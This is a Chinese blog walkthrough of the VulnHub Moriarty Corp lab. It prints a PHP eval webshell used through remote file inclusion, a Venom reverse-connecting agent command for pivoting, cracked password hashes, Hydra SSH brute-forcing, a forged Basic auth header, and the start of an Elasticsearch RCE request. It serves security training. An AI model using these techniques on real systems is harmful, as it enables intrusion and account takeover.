vulnhub_内网渗透测试的记录——网络安全

已于 2024-01-05 11:35:55 修改
阅读量422 收藏
点赞数
文章标签: web安全 安全 服务器 网络安全 网络
于 2023-01-03 18:07:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yz_weixiao/article/details/128536290
版权

主要考察知识点

 文件包含内网穿透命令上传弱口令更改权限HTTP协议HeaderElasticSearch-CVE暴力破解

网络拓扑

写完之后把靶机的网络拓扑也做了一下

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/2f585304b0194bcb962f13a2b3448648~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091427887fb0c103c717e6.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091427887fb0c103c717e6.png”” style=“margin: auto” />

写在之前

这次用的虚拟机是VM_VirtualBox,第一次用,配置了许久,因为靶机是内网环境,所以有些网络配置需要手动调整

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5561758631bc46bf95c249845cdc7829~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609142882d29ed8a2365a91.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609142882d29ed8a2365a91.png”” style=“margin: auto” />

网络配置设置成如上,再次扫描IP,根据MAC地址就可以找到我们的靶机IP了。

靶机下载地址:

BoredHackerBlog: Moriarty Corp

渗透过程

IP发现

这里使用的windows的环境进行渗透测试,使用Advanced_IP_Scanner进行内网IP扫描

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/865761d8c29a4bf4be5d2370c8edb1c8~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F20060914297970f475d6bec1f5.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F20060914297970f475d6bec1f5.png”” style=“margin: auto” />

根据MAC地址发现IP,对获取到的IP进行端口扫描

端口扫描

这里使用的是御剑端口扫描器进行发现

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/c0f4c8a5169746cc812302cf9fa1d2d7~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091429a26ef4381ae05e02.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091429a26ef4381ae05e02.png”” style=“margin: auto” />

发现存在8000端口和9000端口可疑端口,尝试进行WEB访问

WEB渗透

访问8000端口

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/22e2d85dfdcd42acbc13f5f24d2e5760~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091430714c483dee13d980.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091430714c483dee13d980.png”” style=“margin: auto” />

是一个提交flag的页面,同时显示了我们的任务进度,首先根据提示提交第一个flag

再次显示新的提示

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/adfd317a8eeb428aa8003bec88d59c1c~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609143066c2da9a06a85a32.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609143066c2da9a06a85a32.png”” style=“margin: auto” />

结合强大的百度翻译和谷歌翻译,大概明白了让我们从80端口开始渗透,然后在此提交flag,这个时候再次访问80端口

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/7d6ff592352d4a8383f3982227051ac0~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091431f01c4b2d63b7399f.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091431f01c4b2d63b7399f.png”” style=“margin: auto” />

已经可以成功访问了,正式开始我们的渗透过程

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/2cd0c30717534f51ac97a19bb5d74399~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091431ee0ea418afd64d7e.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091431ee0ea418afd64d7e.png”” style=“margin: auto” />

根据url发现疑似存在文件包含漏洞,尝试读取一下敏感数据

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/56104609c0a44c4e8f476cfa34fcfcca~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091431599b6d75014e1248.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091431599b6d75014e1248.png”” style=“margin: auto” />

成功读取/etc/passwd文件,我们构造一下查看能否远程包含webshell

首先在本地服务器构造webshell

<?php
eval($_REQUEST['pdsdt']);
echo 'Welcome Hacker';
phpinfo();
?>

尝试远程文件包含

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/73115deb3b624178bbdfc1fda6ec2665~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091431ca909af92a41a06c.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091431ca909af92a41a06c.png”” style=“margin: auto” />

成功包含远程文件,使用蚁剑链接webshell

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ee79d07c673d45bfa8a0fd0f449e17a8~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609143272d0a212f20db032.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609143272d0a212f20db032.png”” style=“margin: auto” />

找寻flag和下一步的信息

在根目录下发现flag文件

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/b47f7c9061a649ff8a2ecf4f2d5c561f~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091434407b916bc81bf5f5.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091434407b916bc81bf5f5.png”” style=“margin: auto” />

在8000页面进行提交,提交完毕之后再次给了我们提示

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/38c3379a0bc441688c9ce59013666df8~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091434afbc63edf79b6b74.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091434afbc63edf79b6b74.png”” style=“margin: auto” />

大概意思就是告诉我们网站的web服务已经没有什么有价值的信息了,下一步需要内网渗透,同时给了我们内网的网段,下一步就是转发流量进行内网渗透了

内网渗透-设置代理

设置内网代理,这里设置内网代理的方式有很多种,也可以使用MSF全程进行测试,因为为了方便,这里使用的是Venom&proxifier进行流量转发

首先上传agent服务端节点

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5abaafa5e62a4e9d8d86e19f79c77cff~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091434011454436a864a26.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091434011454436a864a26.png”” style=“margin: auto” />

在windows端启动admin程序监听

admin.exe -lport 9999

在agent端修改程序权限为777,并执行命令

./agent_linux_x64 -rhost 192.168.1.101 -rport 9999

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/a29e5387be2a4e7aaa0be04d93213975~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091434308583fec6c3c66f.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091434308583fec6c3c66f.png”” style=“margin: auto” />

成功监听到数据

设置sock5代理

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/111a7872ae794a65aea07261b2fb9c49~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091434e9d28c0a1f7826a8.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091434e9d28c0a1f7826a8.png”” style=“margin: auto” />

设置proxifier

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/fc2def94c45341e08c6d07b86610614e~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609143694612cd54361a9b6.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609143694612cd54361a9b6.png”” style=“margin: auto” />

尝试内网访问靶机

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/31305c266a6c4d2bb6cd725126a637a9~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F20060914371618000814d44d42.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F20060914371618000814d44d42.png”” style=“margin: auto” />

成功访问

下一步进行具体的内网漫游了

首先获取一下内网存活的靶机,根据题目提示的网段进行扫描

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/61ea72c4cdbc497cb0d7fc21d752a217~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609143793bc0209538c867e.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609143793bc0209538c867e.png”” style=“margin: auto” />

发现172.17.0.4的靶机存在web页面,尝试访问一下

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/44c54ff1686f4f06884f5371a8b50173~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609143781741e313d2e8ca5.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609143781741e313d2e8ca5.png”” style=“margin: auto” />

发现是一个上传文件的点,同时需要我们输入密码才能成功上传,先burp抓包,跑一下常见的弱口令

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/eeb47a8b6165419cbfe5e7704609a823~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F20060914376e17efc78c556a37.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F20060914376e17efc78c556a37.png”” style=“margin: auto” />

抓到包了,尝试fuzz一下密码

当尝试弱口令password时,显示成功上传…

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5514dc3813374c9db4beaaa2a2977d5b~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609143973de79cdc4e8ac1f.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609143973de79cdc4e8ac1f.png”” style=“margin: auto” />

根据反馈的页面,尝试访问我们的webshell

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/2e1cb7946a724c51a95d2623c786be68~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091439b2dc55481c0c5a3a.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091439b2dc55481c0c5a3a.png”” style=“margin: auto” />

代码执行成功,说明成功上传,蚁剑连接一下

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/3787f8ef247b44fe9d6bc2253fee3dbc~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091439b80d07bd40e8962f.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091439b80d07bd40e8962f.png”” style=“margin: auto” />

再次找到一个flag文件,尝试在8000页面提交

页面再次给出了提示

<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5140aa60d35b46449e2bb942a36cfb20~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)大概的意思就是给了我们用户名和加密的密码,让破解这些hash加密的密码后尝试ssh登" style=“margin: auto” />

username:
root
toor
admin
mcorp
moriarty 

password:
63a9f0ea7bb98050796b649e85481845
7b24afc8bc80e548d66c4e7ff72171c5
5f4dcc3b5aa765d61d8327deb882cf99
21232f297a57a5a743894a0e4a801fc3
084e0343a0486ff05530df6c705c8bb4
697c6cc76fdbde5baccb7b3400391e30
8839cfc8a0f24eb155ae3f7f205f5cbc
35ac704fe1cc7807c914af478f20fd35
b27a803ed346fbbf6d2e2eb88df1c51b
08552d48aa6d6d9c05dd67f1b4ba8747

同时提示我们密码需要暴力枚举,二话不说使用cmd5somd5,最后查询的结果:

hash值明文
63a9f0ea7bb98050796b649e85481845root
7b24afc8bc80e548d66c4e7ff72171c5toor
5f4dcc3b5aa765d61d8327deb882cf99password
21232f297a57a5a743894a0e4a801fc3admin
084e0343a0486ff05530df6c705c8bb4guest
697c6cc76fdbde5baccb7b3400391e30MORIARTY
8839cfc8a0f24eb155ae3f7f205f5cbcMCORP
35ac704fe1cc7807c914af478f20fd35mcorp
b27a803ed346fbbf6d2e2eb88df1c51bweapons
08552d48aa6d6d9c05dd67f1b4ba8747moriarty

再次扫描一下内网存在22端口的机子

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/279d3578f9be43088399d45866c85a63~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F20060914390eac9af2af72d36d.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F20060914390eac9af2af72d36d.png”” style=“margin: auto” />

发现172.17.0.5的SSH端口是开放的,根据获取到的信息构造字典,使用SSH爆破工具进行爆破(最后使用Hydra进行爆破成功的)

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/bede679a9b3348fcb96d3f2ad5649143~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F20060914414e913fdd8e6a42f6.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F20060914414e913fdd8e6a42f6.png”” style=“margin: auto” />

获取到密码为:

root / weapons

使用xshell进行登陆

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/707140af845847569c7ec1fad9989a1b~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091441bef3dd3525bf7945.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091441bef3dd3525bf7945.png”” style=“margin: auto” />

再次获取到flag

我们在8000端口进行提交,再次更新了提示

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/dc547ca16a3542a4ac3be22ef5093cfc~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091441109ed01a35747365.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091441109ed01a35747365.png”” style=“margin: auto” />

大概意思就是内网里面还有个聊天的程序,端口不在80让我们扫描一下他指定的几个端口,同时给了一个账户,让我们获取管理员用户的记录,先用指定的端口扫描一下网段

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/e68ba13ffacb4c3f986b72c3cee8dc5e~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091441f7f777e4bb051689.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091441f7f777e4bb051689.png”” style=“margin: auto” />

发现172.17.0.6的8000端口是开放的,尝试访问一下

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/e11d0fe911744bfeb5dffd870126af2d~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091442a7abb33afd76c5cf.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091442a7abb33afd76c5cf.png”” style=“margin: auto” />

提示我们需要登陆,根据刚才提示给我们的账户进行登陆

Here are the credentials our agent has obtained from another source:
username: buyer13
password: arms13

登陆成功

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/a2b35ec309414832930a1ceb08b7ea83~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091443e08892e1a3cfc5e2.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091443e08892e1a3cfc5e2.png”” style=“margin: auto” />

发现网站有两个功能,查看聊天记录,修改密码,尝试访问修改密码页面,抓一下包,看看是否存在任意用户密码重置

修改用户名为admin

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8481b232bc6a4ac2b2fca3f2fa7c6484~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F20060914433453c422846a76c6.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F20060914433453c422846a76c6.png”” style=“margin: auto” />

浏览数据包,发现在header头中存在问题

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/aadf3467a4034adeba6f172f52e0eee7~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609144319fa998243cd4fbb.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609144319fa998243cd4fbb.png”” style=“margin: auto” />

Authorization: Basic YnV5ZXIxMzphcm1zMTM=

解密一下

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/22693f0ef7f54b35b5f77e5a3a35adad~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609144371cb0e0af546031f.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609144371cb0e0af546031f.png”” style=“margin: auto” />

携带的是用户的姓名和密码,我们尝试构造一下管理员的身份并修改密码为admin

Authorization: Basic YWRtaW46YWRtaW4=

回到web页面,重新登陆,或者更改header头访问

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/e11686e336be426584475d3ecba877ef~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091444a1aece6d508800dc.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091444a1aece6d508800dc.png”” style=“margin: auto” />

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/9cc00ebd5dee4f5a89ab36ff45611051~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091447381655c0e3c9434d.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091447381655c0e3c9434d.png”” style=“margin: auto” />

成功登陆admin用户,访问chats

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/866df805f36349a7ba4e24d522118950~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F200609144747dc1734d0dfa62b.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F200609144747dc1734d0dfa62b.png”” style=“margin: auto” />

再次获取到flag,提交

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/db8e8628bfde4b0b8e556f996e6063f7~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091448d51ecded6839350a.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091448d51ecded6839350a.png”” style=“margin: auto” />

我看了半天,这不是ES嘛,最近做项目正在用的东西,真是巧儿他妈给巧儿开门,巧儿到家了,扫描一下网段的9200端口

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5b984314fded40f5af8736c427b42221~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F20060914471faa17786063f026.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F20060914471faa17786063f026.png”” style=“margin: auto” />

访问一下页面,标准的ES搜索页面

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/fca3577fcae94971ab36b33d630917dd~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fwww.t00ls.net%252Fattachments%252Fmonth_2006%252F2006091447f6b7021613b08f90.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fwww.t00ls.net%2Fattachments%2Fmonth_2006%2F2006091447f6b7021613b08f90.png”” style=“margin: auto” />

尝试一下ES的任意代码执行漏洞

构造数据包,创建一条数据

POST /mitian/mitian6/ HTTP/1.1
